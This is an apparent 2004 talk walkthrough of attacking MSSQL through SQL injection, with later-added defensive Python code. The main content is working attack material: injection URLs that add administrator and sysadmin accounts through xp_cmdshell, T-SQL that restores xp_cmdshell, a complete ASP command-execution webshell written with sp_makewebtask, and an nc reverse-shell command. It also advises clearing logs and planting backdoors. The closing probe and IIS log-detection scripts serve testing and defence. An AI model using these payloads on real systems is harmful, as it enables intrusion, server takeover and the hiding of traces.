Thinking MSSQL SQL Injection


M$SQL Sql Injection Thinking
DM Wang
2004.10.16
Chroot Meeting

1. Scan the SQL injection target's ports.
2. Check which services are running.
3. If the target runs Terminal Services, use xp_cmdshell to add a system account; if that succeeds, connect with the Terminal Services client and log in to the system.
4. If you can connect to port 1433, try to add a SQL Server administrative account; if that succeeds, connect to the target with sqlexec.exe.
5. If steps 3 and 4 fail, xp_cmdshell may have been removed. Test with osql.exe and Query Analyzer. If xp_cmdshell has been removed it can be restored, but restoring it requires xplog70.dll. If the target no longer has xplog70.dll you must upload it, and uploading a file requires a webshell, so you must write a webshell onto the server; that step requires knowing the web site's physical path.
6. Once a webshell is on the target you can execute commands through the web page, but only with the IIS account's privileges, so privileges must be escalated.
7. Privilege escalation:
   MS04-019
   MS04-020
   other program vulnerabilities
   restore xp_cmdshell and execute commands through it (they run as the SQL Server service account, frequently LocalSystem on SQL Server 2000)
8. Clean logs, install a backdoor.
Attack flow: Port Scan -> T.S / SQL / Web -> xp_cmdshell -> Recover xp_cmdshell -> Webshell
Port Scan

fscan -qp 1-5000 x.x.x.x
FScan v1.12 - Command line port scanner.
Copyright 2000 (c) by Foundstone, Inc.
http://www.foundstone.com

Scan started at Sat Sep 18 22:54:30 2004

x.x.x.x   22/tcp    220 Serv-U FTP Server v5.0 for WinSock ready...
x.x.x.x   25/tcp
x.x.x.x   80/tcp    Microsoft-IIS/5.0
x.x.x.x   110/tcp
x.x.x.x   1025/tcp
x.x.x.x   1026/tcp
x.x.x.x   1029/tcp
x.x.x.x   1433/tcp  Sql Server
x.x.x.x   3372/tcp
x.x.x.x   3388/tcp  Terminal Service
Sql Injection check

http://www.something.com/script.asp?id=2 and 1=1
IE returns the normal record.
http://www.something.com/script.asp?id=2 and 1=2
IE does not return the normal record.
If both hold, the page has a SQL injection vulnerability. Compare each response with the unmodified request: a page whose content changes on every load gives false positives, and a page that ignores the parameter returns the same content for both probes and is not injectable through it.
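The two-request test above, as an added Python example that is not part of the original slides: vulnerable_page models the slide's script.asp (the id value concatenated into the query, here against a constructed in-memory SQLite table rather than MSSQL), hardened_page is the fix with input validation and a bound parameter, and boolean_sqli_check / error_probe implement the 1=1 / 1=2 comparison and the lone-quote check against either page. Function and table names are the example's own.

```python
import re
import sqlite3
from typing import Callable

# Constructed stand-in for the target's database: a small news table queried by id.
_conn = sqlite3.connect(":memory:")
_conn.executescript(
    "CREATE TABLE news (id INTEGER PRIMARY KEY, title TEXT);"
    "INSERT INTO news VALUES (1, 'first'), (2, 'second'), (3, 'third');"
)


def vulnerable_page(id_param: str) -> str:
    """Models script.asp from the slide: the id value is concatenated into the SQL text."""
    sql = "SELECT title FROM news WHERE id=" + id_param
    try:
        row = _conn.execute(sql).fetchone()
    except sqlite3.Error as exc:
        # A raw database error reaching the browser is what the trailing ' probe looks for.
        return "Database error: " + str(exc)
    return "<p>" + row[0] + "</p>" if row else "<p>no record</p>"


def hardened_page(id_param: str) -> str:
    """The fix: validate the shape of the input, then bind it as a parameter."""
    if not re.fullmatch(r"\d{1,9}", id_param):
        return "<p>bad request</p>"
    row = _conn.execute("SELECT title FROM news WHERE id=?", (int(id_param),)).fetchone()
    return "<p>" + row[0] + "</p>" if row else "<p>no record</p>"


def boolean_sqli_check(fetch: Callable[[str], str], id_value: str) -> bool:
    """The slide's test: 'and 1=1' must give the normal page, 'and 1=2' must not.

    Both probes are compared against the unmodified request. A page that ignores
    the parameter answers 'and 1=2' with the baseline and is reported as not
    injectable; a page that differs on every load fails the 'and 1=1' comparison.
    """
    baseline = fetch(id_value)
    true_page = fetch(id_value + " and 1=1")
    false_page = fetch(id_value + " and 1=2")
    return true_page == baseline and false_page != baseline


def error_probe(fetch: Callable[[str], str], id_value: str) -> bool:
    """The 'Other check' from the slide: a lone quote should break the SQL syntax."""
    baseline = fetch(id_value)
    broken = fetch(id_value + "'")
    return broken != baseline and "error" in broken.lower()


if __name__ == "__main__":
    for name, page in (("vulnerable", vulnerable_page), ("hardened", hardened_page)):
        print(name, "boolean:", boolean_sqli_check(page, "2"),
              "error:", error_probe(page, "2"))
```

Against a live target, fetch would be an HTTP GET of script.asp?id=<value>; the comparison logic stays the same. The hardened page rejects both probes before they reach the database, which is why neither check fires against it.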
Other check
http://xxx.xxx.xxx.xxx/asp/zcfg/xs.asp?id=294'
(a lone quote breaks the SQL syntax; a database error page confirms the parameter reaches the query)
NBSI2 (automated injection tool)
List directories: xp_dirtree, xp_subdirs
Execute commands: xp_cmdshell
http://xxx.xxx.xxx.xxx/asp/zcfg/xs.asp?id=294%20and%201=(select%20@@VERSION)
(comparing the integer 1 with @@VERSION forces a conversion that fails, and the error message discloses the version string)
Check xp_cmdshell
http://xxx.xxx.xxx.xxx/asp/zcfg/xs.asp?id=294%20and%201=(SELECT%20count(*)%20FROM%20master.dbo.sysobjects%20WHERE%20xtype%20=%20'X'%20AND%20name%20=%20'xp_cmdshell')
(xtype 'X' is an extended stored procedure; the page renders normally only if the count is 1, i.e. xp_cmdshell is still registered)
Recover xp_cmdshell
http://xxx.xxx.xxx.xxx/asp/zcfg/xs.asp?id=294;exec%20master.dbo.sp_addextendedproc%20'xp_cmdshell','xplog70.dll'
Add a system user, connect to T.S

;exec master.dbo.xp_cmdshell 'net user username password /add';--
;exec master.dbo.xp_cmdshell 'net localgroup administrators username /add';--
Local -> Remote, Terminal Services on port 3388
Create Webshell
1. Have SQL injection
2. Find the web site's physical path (xp_regread)
3. Execute sp_makewebtask
Reference commands (results go into a temporary table that can then be read back):

;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));--
List all disks:
;insert temp exec master.dbo.xp_availablemedia;--
Get the directory list:
;insert into temp(id) exec master.dbo.xp_subdirs 'c:\';--
Get the whole directory structure:
;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';--

Web's physical path: D:\ChinaSC
Read it from the registry with xp_regread, store it in a table, then leak it through a conversion error:
http://xxx.xxx.xxx.xxx/asp/zcfg/xs.asp?id=294;create table [dbo].[cyfd] ([gyfd][char](255));
http://xxx.xxx.xxx.xxx/asp/zcfg/xs.asp?id=294;DECLARE @result varchar(255) EXEC master.dbo.xp_regread 'HKEY_LOCAL_MACHINE','SYSTEM\ControlSet001\Services\W3SVC\Parameters\Virtual Roots','/',@result output insert into cyfd(gyfd) values(@result);--
http://xxx.xxx.xxx.xxx/asp/zcfg/xs.asp?id=294 and 1=(select count(*) from cyfd where gyfd>1)
The last request compares the char column with an integer; SQL Server's conversion error message quotes the stored value, which begins with the site's physical path.
sp_makewebtask (T-SQL): creates a task that produces an HTML document containing data returned by executed queries.
Create Webshell
The request as sent has = encoded as %3d, % as %25 and & as %26 so that the ASP and query-string characters survive the URL; decoded it reads:

exec sp_makewebtask @outputfile='D:\ChinaSC\aacc.asp',@charset=gb2312,@query='select ''<%On Error Resume Next : Set oscript = Server.CreateObject("wscript.SHELL") : Set oscriptNet = Server.CreateObject("wscript.NETWORK") : Set oFileSys = Server.CreateObject("scripting.FileSystemObject") : szCMD = Request.Form(".CMD") : If (szCMD <>"")Then : szTempFile = "C:\" & oFileSys.GetTempName() : Call oscript.Run ("cmd.exe /c " & szCMD & " > " & szTempFile, 0, True) : Set oFile = oFilesys.OpenTextFile(szTempFile, 1, False, 0) : End If %> <HTML><BODY><FORM action="<%= Request.ServerVariables("URL")%>" method="POST"><input type=text name=".CMD" size=45 value="<%= szCMD %>"><input type=submit value="Run"> </FORM><PRE><% If (IsObject(oFile))Then : On Error Resume Next : Response.Write Server.HTMLEncode(oFile.ReadAll) : oFile.Close : Call oFileSys.DeleteFile(szTempFile, True) : End If%> </BODY></HTML> '''

sp_makewebtask writes the query result, wrapped in its own HTML, to D:\ChinaSC\aacc.asp; IIS interprets only the <% %> blocks, so the surrounding HTML is harmless. The page takes a command from the .CMD form field, runs it with cmd.exe /c, redirects the output to a temp file and echoes it back. The doubled single quotes ('') are T-SQL's escape for a literal quote inside the @query string.

D:\ChinaSC\aacc.asp

The xp.exe found on the target is a renamed nc.exe. Use it to connect back and get a command shell:
on the attacker's host: nc.exe -nvv -l -p port
on the target (through the webshell): xp.exe -e cmd.exe ip port
Upload Tools
1. FTP
2. TFTP
3. Wget
4. debug.exe (rebuild a binary from a text script)
5. cscript webdown.vbs (a VBScript downloader)
Up Privilege
MS04-019
MS04-020
Serv-U local exploit (the scan showed Serv-U FTP Server v5.0 on port 22)
Recovery xp_cmdshell
Upload xplog70.dll to C:\Inetpub\scripts\xplog70.dll
If the DLL was only unregistered and still sits in its default location (the SQL Server Binn directory), sp_addextendedproc 'xp_cmdshell','xplog70.dll' finds it without a path; if it was deleted, upload it and register it with the full path.
Add SQL Sysadmin user
(This needs the injected connection to be in the sysadmin role, typically because the web application connects as sa.)

Add SQL user:
(1) http://www.xxx.com/new/new.asp?id=49;exec master.dbo.sp_addlogin fmzm;--
Set SQL account FMZM's password to FMZM:
(2) http://www.xxx.com/new/new.asp?id=49;exec master.dbo.sp_password null,fmzm,fmzm;--
Add FMZM to the sysadmin role:
(3) http://www.xxx.com/new/new.asp?id=49;exec master.dbo.sp_addsrvrolemember sysadmin fmzm;--
Use sqlexec to connect
Use osql.exe and Query Analyzer to check
Query Analyzer: execute stored procedures
Delete xp_cmdshell

if exists (select * from dbo.sysobjects where id = object_id(N'[dbo].[xp_cmdshell]') and OBJECTPROPERTY(id, N'IsExtendedProc') = 1)
exec sp_dropextendedproc N'[dbo].[xp_cmdshell]'
GO
Create xp_cmdshell

exec master.dbo.sp_addextendedproc
'xp_cmdshell','c:\inetpub\scripts\xplog70.dll'
Succeed!!
Add System Account
Connect to T.S
Use xp_cmdshell execute nc.exe
Get System Privilege
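Every step in the chain above goes through the web server, so it lands in the IIS log as a query string. Below is an added detection example written for this page, not part of the original talk: it percent-decodes cs-uri-query from a constructed IIS W3C log excerpt (client addresses and timestamps are invented; the payloads are the ones shown on these slides) and flags stacked exec calls, the 1=1/1=2 probe, sysobjects/@@version recon, xp_cmdshell, sp_addextendedproc, sp_makewebtask, xp_regread and the directory enumeration procedures, and pulls the @outputfile path out of an sp_makewebtask call so a responder knows where the webshell was written. The rule labels and the assumed #Fields layout are the example's own.

```python
import re
from urllib.parse import unquote

# Constructed IIS W3C log excerpt reproducing the requests from these slides; the
# client addresses and timestamps are made up. The parser assumes this #Fields order.
SAMPLE_LOG = r"""#Fields: date time c-ip cs-method cs-uri-stem cs-uri-query sc-status
2004-09-18 22:54:30 10.0.0.5 GET /asp/zcfg/xs.asp id=294%20and%201=1 200
2004-09-18 22:54:31 10.0.0.5 GET /asp/zcfg/xs.asp id=294%20and%201=(SELECT%20count(*)%20FROM%20master.dbo.sysobjects%20WHERE%20xtype%20=%20'X'%20AND%20name%20=%20'xp_cmdshell') 200
2004-09-18 22:54:40 10.0.0.5 GET /asp/zcfg/xs.asp id=294;exec%20master.dbo.sp_addextendedproc%20'xp_cmdshell','xplog70.dll' 500
2004-09-18 22:55:02 10.0.0.5 GET /asp/zcfg/xs.asp id=294;exec%20master.dbo.xp_cmdshell%20'net%20user%20username%20password%20/add';-- 500
2004-09-18 22:55:10 10.0.0.5 GET /asp/zcfg/xs.asp id=294;exec%20sp_makewebtask%20@outputfile%3d'D:\ChinaSC\aacc.asp',@charset%3dgb2312,@query%3d'select%20''<%25On%20Error%20Resume%20Next%25>''' 500
2004-09-18 22:55:30 10.0.0.9 GET /asp/zcfg/xs.asp id=294 200
"""

# (label, pattern) pairs matched against the decoded query string, in this order.
RULES = [
    ("stacked query", r";\s*exec\b"),
    ("boolean probe", r"\band\s+1\s*=\s*[12]\b"),
    ("xp_cmdshell", r"\bxp_cmdshell\b"),
    ("sp_addextendedproc", r"\bsp_addextendedproc\b"),
    ("sp_makewebtask", r"\bsp_makewebtask\b"),
    ("xp_regread", r"\bxp_regread\b"),
    ("filesystem enumeration", r"\bxp_(?:dirtree|subdirs|availablemedia)\b"),
    ("version/sysobjects recon", r"\bsysobjects\b|@@version"),
]
_COMPILED = [(label, re.compile(pat, re.IGNORECASE)) for label, pat in RULES]
_OUTPUTFILE = re.compile(r"@outputfile\s*=\s*'([^']+)'", re.IGNORECASE)


def decode_query(query: str, rounds: int = 3) -> str:
    """Percent-decode repeatedly (bounded) so double-encoded payloads are seen in the clear.

    unquote() rather than unquote_plus(): '+' is string concatenation in T-SQL and
    must survive decoding.
    """
    for _ in range(rounds):
        decoded = unquote(query)
        if decoded == query:
            break
        query = decoded
    return query


def analyze_log(lines):
    """Return one finding record per log line whose query string matches a rule."""
    hits = []
    for line in lines:
        if not line or line.startswith("#"):
            continue
        parts = line.split()
        if len(parts) < 7:
            continue
        date, time, client, method, stem, query, status = parts[:7]
        decoded = decode_query(query)
        findings = [label for label, rx in _COMPILED if rx.search(decoded)]
        if not findings:
            continue
        m = _OUTPUTFILE.search(decoded)
        hits.append({
            "time": f"{date} {time}",
            "client": client,
            "stem": stem,
            "status": status,
            "findings": findings,
            "query": decoded,
            "outputfile": m.group(1) if m else None,  # where sp_makewebtask dropped the file
        })
    return hits


if __name__ == "__main__":
    for hit in analyze_log(SAMPLE_LOG.splitlines()):
        dropped = f" -> dropped file: {hit['outputfile']}" if hit["outputfile"] else ""
        print(hit["time"], hit["client"], hit["status"], ", ".join(hit["findings"]) + dropped)
```

Run as-is it reports five flagged requests from 10.0.0.5 and nothing for the benign one; to use it on a real log, read the file's lines instead of SAMPLE_LOG and adjust the field positions to the log's #Fields line. The connect-back shell that xp_cmdshell launches with nc.exe never passes through IIS, so that hop needs network or process telemetry rather than web logs.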